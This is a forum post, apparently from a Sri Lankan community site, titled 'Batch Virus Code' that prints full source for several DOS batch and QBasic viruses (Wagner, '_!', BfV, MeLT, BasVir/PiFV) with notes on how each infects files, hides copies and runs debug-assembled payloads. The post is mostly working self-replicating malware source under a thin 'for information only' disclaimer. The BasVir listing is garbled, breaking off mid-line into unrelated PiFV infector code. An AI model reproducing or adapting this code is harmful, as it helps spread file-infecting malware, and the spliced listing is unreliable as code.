Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
Handmade Character Soft Toys Peppa Pig Family
anil1961
Updated:
Yesterday at 9:58 PM
Ad icon
Video Content Creator
pramukag
Updated:
Sunday at 6:10 AM
Ad icon
QA Engineer Intern
pramukag
Updated:
Sunday at 6:07 AM
Ad icon
Sell your Land, House on idamata.lk for FREE
sajith.xp.pk
Updated:
Jun 25, 2026
Handmade Character Soft Toys
anil1961
Updated:
Jun 23, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
Computers & Internet
Tips & Tricks
Tips & Tricks Collection of DC
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="||~DxxCxxxx~||" data-source="post: 4960232" data-attributes="member: 137393"><p><strong>Batch Virus Code</strong></p><p></p><p><strong><img src="http://thewwwblog.com/images/c/computer-virus.jpg" alt="" class="fr-fic fr-dii fr-draggable " style="" /></strong></p><p> </p><p> </p><p><strong><span style="color: blue">====================================================</span></strong></p><p><strong><span style="color: blue">Most of the virus in here are harmful to your system so, I recommend not to try </span></strong></p><p><strong><span style="color: blue">yourself or to your friend's computer. </span></strong><strong><span style="color: blue">This is just for your information only. </span></strong></p><p><strong><span style="color: #0000ff">====================================================</span></strong></p><p> </p><p><strong>The Wagner Virus</strong> </p><p> </p><p>[code]@echo off </p><p>ctty nul </p><p>rem ________________________________________________________________ </p><p>rem :Wagner Virus, as presented in Virology 101 (c) 1993 Black Wolf </p><p>rem :This virus can be cured simply by typing "attrib -h -r *.*" in </p><p>rem :infected directories and deleting BAT files that are identical </p><p>rem :to this code, then rename the files having a "V" at the start </p><p>rem :to their original names. NOTE: Does not infect COMMAND.COM. </p><p>rem :______________________________________________________________ </p><p>for %%f in (*.exe *.com) do set A=%%f </p><p>if %A%==COMMAND.COM set A= </p><p>rename %A% V%A% </p><p>if not exist V%A% goto end </p><p>attrib +h V%A% </p><p>copy %0.bat %A% </p><p>attrib +r %A% </p><p>ren %A% *.bat </p><p>set A= </p><p>:end </p><p>ctty con </p><p>@if exist V%0.com V%0.com %1 %2 %3 </p><p>@if exist V%0.exe V%0.exe %1 %2 %3 [/code]</p><p> </p><p><strong>Batch virus "_!" </strong></p><p> </p><p>Infects parent and current directories</p><p>Virus code is appended to the host batch</p><p>Only works if host is in current directory</p><p>Infects just one batch unless new clean batches are added. </p><p> </p><p>This is a very simple batch virus. When it runs it appends its code to another batch file in the parent or current directory. It is not very effective but illustrates the basics. </p><p> </p><p> </p><p>[code]@ctty nul._! </p><p>for %%a in (*.bat ..\*.bat) do set _!=%%a </p><p>find "_!"<%_!% </p><p>if errorlevel 1 find "_!"<0>>%_!% </p><p>ctty con._! [/code]</p><p> </p><p> </p><p><strong>Batch virus "BfV"</strong> </p><p> </p><p>Creates the hidden file "_BFV" in the root directory of drive C </p><p>Infects one batch per run in current and parent directories </p><p>Gives up after encountering seven infected batches </p><p>Virus code is appended to the host batch </p><p> </p><p>This is an improved appender. It only has to be run from its own directory once to enable it to reproduce even when the host is in a path directory. To avoid slowing batch files down too much it exits if it can't infect after checking seven batch files. If the host batch ends with nul characters it removes them so the virus code will run. </p><p> </p><p>[code]@echo off%[BfV_B]% </p><p>if '%1=='## goto BfV_%2 </p><p>if exist C:\_BfV.bat goto BfV_ </p><p>if not exist %0.bat goto BfV_end </p><p>find "BfV"<0>C:\_BfV.bat </p><p>attrib C:\_BfV.bat +h </p><p>:BfV_ </p><p>command /e:5000 /c C:\_BfV ## run </p><p>goto BfV_end </p><p>:BfV_run </p><p>for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i </p><p>exit BfV </p><p>:BfV_inf </p><p>if '%BfV%=='1111111 exit </p><p>set BfV=%BfV%1 </p><p>find "BfV"<3>nul </p><p>if not errorlevel 1 goto BfV_end </p><p>type %3>BfV </p><p>type C:\_BfV.bat>>BfV </p><p>move BfV %3>nul </p><p>exit BfV </p><p>:BfV_end </p><p>[/code]</p><p> </p><p> </p><p><strong>Batch virus "MeLT"</strong> </p><p> </p><p>Creates the hidden file "MELT_2A" in the temp directory </p><p>Infects files in the current, parent and all path directories </p><p>Infects one batch per run if less than ten infected files encountered </p><p>After detecting ten infected files it displays a graphics screen effect </p><p>Adds one line before the host batch and appends the rest </p><p>Will not run if attached to AUTOEXEC.BAT (but infects it) </p><p> </p><p>This batch virus is much more advanced. It takes control from the host immediately, runs the virus then runs the host batch. The host is run in such a way as to disable the virus until the host is completely finished to avoid slowing down batch files that call themselves in a loop. Simple appenders are very obvious when on such files, but this one causes no significant speed loss except at startup. This virus carries a harmless payload which is assembled with the debug command - it 'melts' the screen in a flash of color then returns it to normal before running the host. </p><p> </p><p>[code]@if not '%0==' if '%_melt%==' goto meltbeg </p><p>::---- dummy host -------- </p><p>@echo off </p><p>echo Hello World! </p><p>::---- end dummy host ---- </p><p> </p><p>@goto MeLTend [MeLT_2a] </p><p>:MeLTbeg </p><p>@echo off%_MeLT% </p><p>if '%1=='MeLT goto MeLT%2 </p><p>if not exist %comspec% set comspec=%_MeLT%command </p><p>%comspec% /e:5000 /c %0 MeLT vir </p><p>set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 </p><p>call %0 MeLT rh </p><p>set _MeLT= </p><p>set MeLTcl= </p><p>goto MeLTend </p><p>:MeLTrh </p><p>set _MeLT=x </p><p>%0 %MeLTcl% </p><p>:MeLTvir </p><p>set MeLTH=%0 </p><p>if not exist %_MeLT%%temp%\nul set temp=%tmp% </p><p>if exist %temp%\MeLT_2a goto MeLTrun </p><p>%0 MeLT fnd . %path% </p><p>:MeLTfnd </p><p>shift%_MeLT% </p><p>if '%2==' exit MeLT </p><p>set MeLT=%2\%MeLTH%.bat </p><p>if not exist %MeLT% set MeLT=%2\%MeLTH% </p><p>if not exist %MeLT% set MeLT=%2%MeLTH%.bat </p><p>if not exist %MeLT% set MeLT=%2%MeLTH% </p><p>if not exist %MeLT% goto MeLTfnd </p><p>find "MeLT"<MeLT>%temp%\MeLT_2a </p><p>attrib %temp%\MeLT_2a +h </p><p>:MeLTrun </p><p>%MeLTH% MeLT s . .. %path% </p><p>:MeLTs </p><p>shift%_MeLT% </p><p>if '%2==' exit MeLT </p><p>for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a </p><p>goto MeLTs </p><p>:MeLTinf </p><p>find /i "MeLT"<3>nul </p><p>if not errorlevel 1 goto MeLTno </p><p>echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t </p><p>type %3>>MeLT.t </p><p>echo.>>MeLT.t </p><p>type %temp%\MeLT_2a>>MeLT.t </p><p>move MeLT.t %3>nul </p><p>exit MeLT </p><p>:MeLTact - flash-melt screen text then put back to normal </p><p>echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t </p><p>echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t </p><p>echo e 120 B4 4C CD 21 00>>MeLT.t </p><p>echo g>>MeLT.t </p><p>debug<MeLT>nul </p><p>del MeLT.t </p><p>exit MeLT </p><p>:MeLTno </p><p>set MeLTC=%MeLTC%1 </p><p>if %MeLTC%==1111111111 goto MeLTact </p><p>:MeLTend [/code]</p><p> </p><p> </p><p><strong>QBasic virus "BasVir"</strong> </p><p> </p><p>Infects one BAS file in the current directory per run </p><p>Inserts its code in front of the host so it will run first </p><p>Does not infect QBasic programs that contain "DECLARE" </p><p>Really a batch virus that hides in BASIC code </p><p>If the host is renamed the virus won't work </p><p> </p><p>I wrote this in response to someone's request on the net for a virus written in BASIC. I hope they don't mind if the BASIC program makes a batch and runs it. It stays out of programs that use procedures to avoid causing errors, such programs cannot tolerate prepended code. This is really a joke, but it's a QBasic virus (no? you write one.) </p><p> </p><p>The following must be named BASVIR.BAS to function. </p><p> </p><p>[code]basvirH$ = "BASVIR.BAS" </p><p>OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir </p><p>PRINT #2, "@echo off %BasVir1%" </p><p>PRINT #2, "if '%1=='BasVir goto BasVir%2" </p><p>PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a" </p><p>PRINT #2, "exit": REM BasVir </p><p>PRINT #2, ":BasVir2" </p><p>PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<3>nul": REM BasVir </p><p>PRINT #2, "if not errorlevel 1 goto BasVirE" </p><p>PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir </p><p>PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<basvirH>nul </p><p>if exist PiFV! del PiFV! </p><p>:: run the host </p><p>set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 </p><p>call %0 PiFV hst </p><p>set PiFVo= </p><p>set PiFVcl= </p><p>:: check for activation... </p><p>echo.|date|find /i "sat">nul.PiFV </p><p>if errorlevel 1 goto PiFV_end </p><p>echo.|time|find "7">nul.PiFV </p><p>if errorlevel 1 goto PiFV_msg </p><p>set PiFV=echo </p><p>cls%_PiFV% </p><p>%PiFV%. </p><p>%PiFV% There once was an Otter named Oscer </p><p>%PiFV% Who claimed to know how to make water. </p><p>%PiFV% "No more dams," he said, "use my water instead!" </p><p>%PiFV% But the Elder Otter was not impressed. </p><p>pause>nul.PiFV </p><p>set PiFV= </p><p>goto PiFV_end </p><p>:PiFV_msg </p><p>echo [PiFV] by WaveFunc </p><p>goto PiFV_end </p><p>:PiFV_hst </p><p>%PiFVo% %PiFVcl% </p><p>goto PiFV_end </p><p>:PiFV_go </p><p>set PiFVh=%0 </p><p>if not exist %PiFVh% set PiFVh=%0.bat </p><p>if not exist %PiFVh% exit </p><p>for %%a in (*.pif) do call %0 PiFV inf %%a </p><p>exit PiFV </p><p>:PiFV_inf </p><p>set PiFVp=%3 </p><p>:: get victim filename and infection marker </p><p>:: from PIF file using debug... </p><p>if exist PiFV! goto PiFV_1 </p><p>echo m 124,162 524>PiFV! </p><p>echo e 100 '@set fn='>>PiFV! </p><p>echo m 524,562 108>>PiFV! </p><p>echo n pifv$.bat>>PiFV! </p><p>echo rcx>>PiFV! </p><p>echo 47>>PiFV! </p><p>echo w>>PiFV! </p><p>echo m 55E,561 108>>PiFV! </p><p>echo e 10C 0>>PiFV! </p><p>echo n pifv$$.bat>>PiFV! </p><p>echo rcx>>PiFV! </p><p>echo 10>>PiFV! </p><p>echo w>>PiFV! </p><p>echo q>>PiFV! </p><p>:PiFV_1 </p><p>debug %PiFVp%<PiFV>nul </p><p>call PiFV$ </p><p>set PiFVn=%fn% </p><p>call PiFV$$ </p><p>set PiFVi=%fn% </p><p>del PiFV$?.bat </p><p>:: pifvn=orig filename </p><p>:: pifvi=infection marker </p><p>:: pifvp=pif filename </p><p>:: pifvh=companion bat file </p><p>:: skip infected or 'empty' pifs... </p><p>if '%PiFVi%=='PiFV goto PiFV_end </p><p>if '%PiFVn%==' goto PiFV_end </p><p>:: don't shadow command.com (be nice) </p><p>echo %PiFVn%|find /i "command">nul </p><p>if not errorlevel 1 goto PiFV_end </p><p>:: infectable - create a companion batch... </p><p>:: (the following code strips off the extension) </p><p>echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$ </p><p>echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$ </p><p>echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$ </p><p>echo n pifv$.com>>PiFV$$ </p><p>echo rcx>>PiFV$$ </p><p>echo 2a>>PiFV$$ </p><p>echo w>>PiFV$$ </p><p>echo q>>PiFV$$ </p><p>debug<PiFV>nul </p><p>echo %PiFVn%|PiFV$>PiFV$$.bat </p><p>call PiFV$$ </p><p>set PiFVb=%fn%.bat </p><p>del PiFV$?.* </p><p>:: pifvb=new batch name </p><p>:: do not shadow if comp has same name as host </p><p>if %PiFVo%==%PiFVb% goto PiFV_end </p><p>if exist %PiFVb% goto PiFV_end </p><p>echo @echo off>%PiFVb% </p><p>echo set pifvo=%pifvn%>>%PiFVb% </p><p>find "PiFV"<PiFVh>>%PiFVb% </p><p>attrib %PiFVb% +h </p><p>:: ...and point the PIF at the companion </p><p>echo e 15E 'PiFV',0>PiFV$$ </p><p>echo e 124 '%PiFVb%',0>>PiFV$$ </p><p>echo w>>PiFV$$ </p><p>echo q>>PiFV$$ </p><p>debug %PiFVp%<PiFV>nul </p><p>del PiFV$$ </p><p>:: I think we're done! </p><p>exit PiFV </p><p>:PiFV_end </p><p>:: wonder how many bugs all this has in it? Only one </p><p>:: way to find out... [/code]</p></blockquote><p></p>
[QUOTE="||~DxxCxxxx~||, post: 4960232, member: 137393"] [b]Batch Virus Code[/b] [B][IMG]http://thewwwblog.com/images/c/computer-virus.jpg[/IMG][/B] [B][COLOR=blue]====================================================[/COLOR][/B] [B][COLOR=blue]Most of the virus in here are harmful to your system so, I recommend not to try [/COLOR][/B] [B][COLOR=blue]yourself or to your friend's computer. [/COLOR][/B][B][COLOR=blue]This is just for your information only. [/COLOR][/B] [B][COLOR=#0000ff]====================================================[/COLOR][/B] [B]The Wagner Virus[/B] [code]@echo off ctty nul rem ________________________________________________________________ rem :Wagner Virus, as presented in Virology 101 (c) 1993 Black Wolf rem :This virus can be cured simply by typing "attrib -h -r *.*" in rem :infected directories and deleting BAT files that are identical rem :to this code, then rename the files having a "V" at the start rem :to their original names. NOTE: Does not infect COMMAND.COM. rem :______________________________________________________________ for %%f in (*.exe *.com) do set A=%%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto end attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat set A= :end ctty con @if exist V%0.com V%0.com %1 %2 %3 @if exist V%0.exe V%0.exe %1 %2 %3 [/code] [B]Batch virus "_!" [/B] Infects parent and current directories Virus code is appended to the host batch Only works if host is in current directory Infects just one batch unless new clean batches are added. This is a very simple batch virus. When it runs it appends its code to another batch file in the parent or current directory. It is not very effective but illustrates the basics. [code]@ctty nul._! for %%a in (*.bat ..\*.bat) do set _!=%%a find "_!"<%_!% if errorlevel 1 find "_!"<0>>%_!% ctty con._! [/code] [B]Batch virus "BfV"[/B] Creates the hidden file "_BFV" in the root directory of drive C Infects one batch per run in current and parent directories Gives up after encountering seven infected batches Virus code is appended to the host batch This is an improved appender. It only has to be run from its own directory once to enable it to reproduce even when the host is in a path directory. To avoid slowing batch files down too much it exits if it can't infect after checking seven batch files. If the host batch ends with nul characters it removes them so the virus code will run. [code]@echo off%[BfV_B]% if '%1=='## goto BfV_%2 if exist C:\_BfV.bat goto BfV_ if not exist %0.bat goto BfV_end find "BfV"<0>C:\_BfV.bat attrib C:\_BfV.bat +h :BfV_ command /e:5000 /c C:\_BfV ## run goto BfV_end :BfV_run for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i exit BfV :BfV_inf if '%BfV%=='1111111 exit set BfV=%BfV%1 find "BfV"<3>nul if not errorlevel 1 goto BfV_end type %3>BfV type C:\_BfV.bat>>BfV move BfV %3>nul exit BfV :BfV_end [/code] [B]Batch virus "MeLT"[/B] Creates the hidden file "MELT_2A" in the temp directory Infects files in the current, parent and all path directories Infects one batch per run if less than ten infected files encountered After detecting ten infected files it displays a graphics screen effect Adds one line before the host batch and appends the rest Will not run if attached to AUTOEXEC.BAT (but infects it) This batch virus is much more advanced. It takes control from the host immediately, runs the virus then runs the host batch. The host is run in such a way as to disable the virus until the host is completely finished to avoid slowing down batch files that call themselves in a loop. Simple appenders are very obvious when on such files, but this one causes no significant speed loss except at startup. This virus carries a harmless payload which is assembled with the debug command - it 'melts' the screen in a flash of color then returns it to normal before running the host. [code]@if not '%0==' if '%_melt%==' goto meltbeg ::---- dummy host -------- @echo off echo Hello World! ::---- end dummy host ---- @goto MeLTend [MeLT_2a] :MeLTbeg @echo off%_MeLT% if '%1=='MeLT goto MeLT%2 if not exist %comspec% set comspec=%_MeLT%command %comspec% /e:5000 /c %0 MeLT vir set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 call %0 MeLT rh set _MeLT= set MeLTcl= goto MeLTend :MeLTrh set _MeLT=x %0 %MeLTcl% :MeLTvir set MeLTH=%0 if not exist %_MeLT%%temp%\nul set temp=%tmp% if exist %temp%\MeLT_2a goto MeLTrun %0 MeLT fnd . %path% :MeLTfnd shift%_MeLT% if '%2==' exit MeLT set MeLT=%2\%MeLTH%.bat if not exist %MeLT% set MeLT=%2\%MeLTH% if not exist %MeLT% set MeLT=%2%MeLTH%.bat if not exist %MeLT% set MeLT=%2%MeLTH% if not exist %MeLT% goto MeLTfnd find "MeLT"<MeLT>%temp%\MeLT_2a attrib %temp%\MeLT_2a +h :MeLTrun %MeLTH% MeLT s . .. %path% :MeLTs shift%_MeLT% if '%2==' exit MeLT for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a goto MeLTs :MeLTinf find /i "MeLT"<3>nul if not errorlevel 1 goto MeLTno echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t type %3>>MeLT.t echo.>>MeLT.t type %temp%\MeLT_2a>>MeLT.t move MeLT.t %3>nul exit MeLT :MeLTact - flash-melt screen text then put back to normal echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t echo e 120 B4 4C CD 21 00>>MeLT.t echo g>>MeLT.t debug<MeLT>nul del MeLT.t exit MeLT :MeLTno set MeLTC=%MeLTC%1 if %MeLTC%==1111111111 goto MeLTact :MeLTend [/code] [B]QBasic virus "BasVir"[/B] Infects one BAS file in the current directory per run Inserts its code in front of the host so it will run first Does not infect QBasic programs that contain "DECLARE" Really a batch virus that hides in BASIC code If the host is renamed the virus won't work I wrote this in response to someone's request on the net for a virus written in BASIC. I hope they don't mind if the BASIC program makes a batch and runs it. It stays out of programs that use procedures to avoid causing errors, such programs cannot tolerate prepended code. This is really a joke, but it's a QBasic virus (no? you write one.) The following must be named BASVIR.BAS to function. [code]basvirH$ = "BASVIR.BAS" OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir PRINT #2, "@echo off %BasVir1%" PRINT #2, "if '%1=='BasVir goto BasVir%2" PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a" PRINT #2, "exit": REM BasVir PRINT #2, ":BasVir2" PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<3>nul": REM BasVir PRINT #2, "if not errorlevel 1 goto BasVirE" PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<basvirH>nul if exist PiFV! del PiFV! :: run the host set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 call %0 PiFV hst set PiFVo= set PiFVcl= :: check for activation... echo.|date|find /i "sat">nul.PiFV if errorlevel 1 goto PiFV_end echo.|time|find "7">nul.PiFV if errorlevel 1 goto PiFV_msg set PiFV=echo cls%_PiFV% %PiFV%. %PiFV% There once was an Otter named Oscer %PiFV% Who claimed to know how to make water. %PiFV% "No more dams," he said, "use my water instead!" %PiFV% But the Elder Otter was not impressed. pause>nul.PiFV set PiFV= goto PiFV_end :PiFV_msg echo [PiFV] by WaveFunc goto PiFV_end :PiFV_hst %PiFVo% %PiFVcl% goto PiFV_end :PiFV_go set PiFVh=%0 if not exist %PiFVh% set PiFVh=%0.bat if not exist %PiFVh% exit for %%a in (*.pif) do call %0 PiFV inf %%a exit PiFV :PiFV_inf set PiFVp=%3 :: get victim filename and infection marker :: from PIF file using debug... if exist PiFV! goto PiFV_1 echo m 124,162 524>PiFV! echo e 100 '@set fn='>>PiFV! echo m 524,562 108>>PiFV! echo n pifv$.bat>>PiFV! echo rcx>>PiFV! echo 47>>PiFV! echo w>>PiFV! echo m 55E,561 108>>PiFV! echo e 10C 0>>PiFV! echo n pifv$$.bat>>PiFV! echo rcx>>PiFV! echo 10>>PiFV! echo w>>PiFV! echo q>>PiFV! :PiFV_1 debug %PiFVp%<PiFV>nul call PiFV$ set PiFVn=%fn% call PiFV$$ set PiFVi=%fn% del PiFV$?.bat :: pifvn=orig filename :: pifvi=infection marker :: pifvp=pif filename :: pifvh=companion bat file :: skip infected or 'empty' pifs... if '%PiFVi%=='PiFV goto PiFV_end if '%PiFVn%==' goto PiFV_end :: don't shadow command.com (be nice) echo %PiFVn%|find /i "command">nul if not errorlevel 1 goto PiFV_end :: infectable - create a companion batch... :: (the following code strips off the extension) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$ echo n pifv$.com>>PiFV$$ echo rcx>>PiFV$$ echo 2a>>PiFV$$ echo w>>PiFV$$ echo q>>PiFV$$ debug<PiFV>nul echo %PiFVn%|PiFV$>PiFV$$.bat call PiFV$$ set PiFVb=%fn%.bat del PiFV$?.* :: pifvb=new batch name :: do not shadow if comp has same name as host if %PiFVo%==%PiFVb% goto PiFV_end if exist %PiFVb% goto PiFV_end echo @echo off>%PiFVb% echo set pifvo=%pifvn%>>%PiFVb% find "PiFV"<PiFVh>>%PiFVb% attrib %PiFVb% +h :: ...and point the PIF at the companion echo e 15E 'PiFV',0>PiFV$$ echo e 124 '%PiFVb%',0>>PiFV$$ echo w>>PiFV$$ echo q>>PiFV$$ debug %PiFVp%<PiFV>nul del PiFV$$ :: I think we're done! exit PiFV :PiFV_end :: wonder how many bugs all this has in it? Only one :: way to find out... [/code] [/QUOTE]
Insert quotes…
Verification
Nawa warak dahaya keeyada? (Namaya wadi kireema dahaya)
Post reply
Top
Bottom